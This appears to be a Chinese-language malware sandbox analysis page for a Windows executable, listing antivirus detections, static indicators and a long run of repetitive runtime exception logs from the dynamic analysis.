5.5
高危

0ac2fe5b0b37a33381f9bd9fc9a51d3977e940add65d74f9569b779e15e7bab8

0ac2fe5b0b37a33381f9bd9fc9a51d3977e940add65d74f9569b779e15e7bab8.exe

分析耗时

135s

最近分析

389天前

文件大小

1.6MB
静态报毒 动态报毒 BUBLIK CVE FAMILY METATYPE PLATFORM TYPE UNKNOWN 更多 WIN32 TROJAN WORM CXIBGIB
鹰眼引擎
DACN 0.14
FACILE 1.00
IMCLNet 0.63
MFGraph 0.00
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
Alibaba None 20190527 0.3.0.5
Avast Win32:Trojan-gen 20191003 18.4.3895.0
Baidu Win32.Worm.VB.a 20190318 1.0.0.2
CrowdStrike win/malicious_confidence_100% (D) 20190702 1.0
Kingsoft None 20191003 2013.8.14.323
McAfee W32/MoonLight.worm.b 20191003 6.0.6.653
Tencent None 20191003 1.0.0.1
静态指标
查询计算机名称 (1 个事件)
Time & API Arguments Status Return Repeated
1727545330.57875
GetComputerNameW
computer_name: TU-PC
success 1 0
检查系统中的内存量,这可以用于检测可用内存较少的虚拟机 (5 个事件)
Time & API Arguments Status Return Repeated
1727545328.124875
GlobalMemoryStatusEx
success 1 0
1727545328.92225
GlobalMemoryStatusEx
success 1 0
1727545328.953375
GlobalMemoryStatusEx
success 1 0
1727545329.00025
GlobalMemoryStatusEx
success 1 0
1727545329.047125
GlobalMemoryStatusEx
success 1 0
可执行文件包含未知的 PE 段名称,可能指示打包器(可能是误报) (3 个事件)
section HSP0
section HSP1
section .imports
文件包含未知的 PE 资源名称,可能指示打包器 (2 个事件)
resource name MIDI
resource name ZIP
一个或多个进程崩溃 (50 out of 153 个事件)
Time & API Arguments Status Return Repeated
1727545328.342875
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1635092
registers.ecx: 2
registers.edx: 0
registers.ebx: 5457464
registers.esp: 1635092
registers.ebp: 1635172
registers.esi: 5457464
registers.edi: 5457464
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545328.358875
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1634668
registers.ecx: 2
registers.edx: 0
registers.ebx: 5457464
registers.esp: 1634668
registers.ebp: 1634748
registers.esi: 5457464
registers.edi: 5457464
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545328.374875
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1634420
registers.ecx: 2
registers.edx: 0
registers.ebx: 5457464
registers.esp: 1634420
registers.ebp: 1634500
registers.esi: 5457464
registers.edi: 5457464
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545328.374875
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1634588
registers.ecx: 2
registers.edx: 0
registers.ebx: 5457464
registers.esp: 1634588
registers.ebp: 1634668
registers.esi: 5457464
registers.edi: 5457464
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545328.389875
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1634480
registers.ecx: 2
registers.edx: 0
registers.ebx: 5457464
registers.esp: 1634480
registers.ebp: 1634560
registers.esi: 5457464
registers.edi: 5457464
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545328.389875
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1634480
registers.ecx: 2
registers.edx: 0
registers.ebx: 5457464
registers.esp: 1634480
registers.ebp: 1634560
registers.esi: 5457464
registers.edi: 5457464
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545328.405875
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1634480
registers.ecx: 2
registers.edx: 0
registers.ebx: 5457464
registers.esp: 1634480
registers.ebp: 1634560
registers.esi: 5457464
registers.edi: 5457464
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545328.405875
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1634480
registers.ecx: 2
registers.edx: 0
registers.ebx: 5457464
registers.esp: 1634480
registers.ebp: 1634560
registers.esi: 5457464
registers.edi: 5457464
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545328.421875
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1634480
registers.ecx: 2
registers.edx: 0
registers.ebx: 5457464
registers.esp: 1634480
registers.ebp: 1634560
registers.esi: 5457464
registers.edi: 5457464
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545328.436875
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1634480
registers.ecx: 2
registers.edx: 0
registers.ebx: 5457464
registers.esp: 1634480
registers.ebp: 1634560
registers.esi: 5457464
registers.edi: 5457464
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545328.436875
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1634480
registers.ecx: 2
registers.edx: 0
registers.ebx: 5457464
registers.esp: 1634480
registers.ebp: 1634560
registers.esi: 5457464
registers.edi: 5457464
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545328.452875
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1634480
registers.ecx: 2
registers.edx: 0
registers.ebx: 5457464
registers.esp: 1634480
registers.ebp: 1634560
registers.esi: 5457464
registers.edi: 5457464
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545328.452875
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1634480
registers.ecx: 2
registers.edx: 0
registers.ebx: 5457464
registers.esp: 1634480
registers.ebp: 1634560
registers.esi: 5457464
registers.edi: 5457464
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545328.467875
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1634480
registers.ecx: 2
registers.edx: 0
registers.ebx: 5457464
registers.esp: 1634480
registers.ebp: 1634560
registers.esi: 5457464
registers.edi: 5457464
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545328.467875
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1634480
registers.ecx: 2
registers.edx: 0
registers.ebx: 5457464
registers.esp: 1634480
registers.ebp: 1634560
registers.esi: 5457464
registers.edi: 5457464
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545328.483875
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1634480
registers.ecx: 2
registers.edx: 0
registers.ebx: 5457464
registers.esp: 1634480
registers.ebp: 1634560
registers.esi: 5457464
registers.edi: 5457464
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545328.483875
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1634480
registers.ecx: 2
registers.edx: 0
registers.ebx: 5457464
registers.esp: 1634480
registers.ebp: 1634560
registers.esi: 5457464
registers.edi: 5457464
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545329.139875
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1635376
registers.ecx: 2
registers.edx: 0
registers.ebx: 5457464
registers.esp: 1635376
registers.ebp: 1635456
registers.esi: 5457464
registers.edi: 5457464
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545329.139875
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1636372
registers.ecx: 2
registers.edx: 0
registers.ebx: 5457464
registers.esp: 1636372
registers.ebp: 1636452
registers.esi: 5457464
registers.edi: 5457464
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545328.95325
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1635080
registers.ecx: 2
registers.edx: 0
registers.ebx: 6247808
registers.esp: 1635080
registers.ebp: 1635160
registers.esi: 6247808
registers.edi: 6247808
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545328.95325
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1635080
registers.ecx: 2
registers.edx: 0
registers.ebx: 6247808
registers.esp: 1635080
registers.ebp: 1635160
registers.esi: 6247808
registers.edi: 6247808
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545329.04725
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1634668
registers.ecx: 2
registers.edx: 0
registers.ebx: 6247808
registers.esp: 1634668
registers.ebp: 1634748
registers.esi: 6247808
registers.edi: 6247808
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545329.04725
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1635196
registers.ecx: 2
registers.edx: 0
registers.ebx: 6247808
registers.esp: 1635196
registers.ebp: 1635276
registers.esi: 6247808
registers.edi: 6247808
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545329.04725
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1635192
registers.ecx: 2
registers.edx: 0
registers.ebx: 6247808
registers.esp: 1635192
registers.ebp: 1635272
registers.esi: 6247808
registers.edi: 6247808
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545329.10925
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1634420
registers.ecx: 2
registers.edx: 0
registers.ebx: 6247808
registers.esp: 1634420
registers.ebp: 1634500
registers.esi: 6247808
registers.edi: 6247808
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545329.12525
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1634588
registers.ecx: 2
registers.edx: 0
registers.ebx: 6247808
registers.esp: 1634588
registers.ebp: 1634668
registers.esi: 6247808
registers.edi: 6247808
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545329.14025
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1634480
registers.ecx: 2
registers.edx: 0
registers.ebx: 6247808
registers.esp: 1634480
registers.ebp: 1634560
registers.esi: 6247808
registers.edi: 6247808
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545329.21825
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1634480
registers.ecx: 2
registers.edx: 0
registers.ebx: 6247808
registers.esp: 1634480
registers.ebp: 1634560
registers.esi: 6247808
registers.edi: 6247808
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545329.21825
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1635008
registers.ecx: 2
registers.edx: 0
registers.ebx: 6247808
registers.esp: 1635008
registers.ebp: 1635088
registers.esi: 6247808
registers.edi: 6247808
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545329.21825
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1635004
registers.ecx: 2
registers.edx: 0
registers.ebx: 6247808
registers.esp: 1635004
registers.ebp: 1635084
registers.esi: 6247808
registers.edi: 6247808
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545329.28125
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1634480
registers.ecx: 2
registers.edx: 0
registers.ebx: 6247808
registers.esp: 1634480
registers.ebp: 1634560
registers.esi: 6247808
registers.edi: 6247808
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545329.29725
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1635008
registers.ecx: 2
registers.edx: 0
registers.ebx: 6247808
registers.esp: 1635008
registers.ebp: 1635088
registers.esi: 6247808
registers.edi: 6247808
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545329.29725
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1635004
registers.ecx: 2
registers.edx: 0
registers.ebx: 6247808
registers.esp: 1635004
registers.ebp: 1635084
registers.esi: 6247808
registers.edi: 6247808
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545329.29725
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1634480
registers.ecx: 2
registers.edx: 0
registers.ebx: 6247808
registers.esp: 1634480
registers.ebp: 1634560
registers.esi: 6247808
registers.edi: 6247808
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545329.29725
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1635008
registers.ecx: 2
registers.edx: 0
registers.ebx: 6247808
registers.esp: 1635008
registers.ebp: 1635088
registers.esi: 6247808
registers.edi: 6247808
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545329.29725
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1635004
registers.ecx: 2
registers.edx: 0
registers.ebx: 6247808
registers.esp: 1635004
registers.ebp: 1635084
registers.esi: 6247808
registers.edi: 6247808
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545329.35925
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1634480
registers.ecx: 2
registers.edx: 0
registers.ebx: 6247808
registers.esp: 1634480
registers.ebp: 1634560
registers.esi: 6247808
registers.edi: 6247808
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545329.40625
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1634480
registers.ecx: 2
registers.edx: 0
registers.ebx: 6247808
registers.esp: 1634480
registers.ebp: 1634560
registers.esi: 6247808
registers.edi: 6247808
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545329.40625
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1635008
registers.ecx: 2
registers.edx: 0
registers.ebx: 6247808
registers.esp: 1635008
registers.ebp: 1635088
registers.esi: 6247808
registers.edi: 6247808
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545329.40625
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1635004
registers.ecx: 2
registers.edx: 0
registers.ebx: 6247808
registers.esp: 1635004
registers.ebp: 1635084
registers.esi: 6247808
registers.edi: 6247808
stacktrace:
EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf
rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228

success 0 0
1727545329.42225
__exception__
exception.address: 0x76e8b727
exception.instruction: leave
exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.exception_code: 0xc000008f
registers.eax: 1634480
registers.ecx: 2
registers.edx: 0
registers.ebx: 6247808
registers.esp: 1634480
registers.ebp: 1634560
registers.esi: 6247808
registers.edi: 6247808
stacktrace:
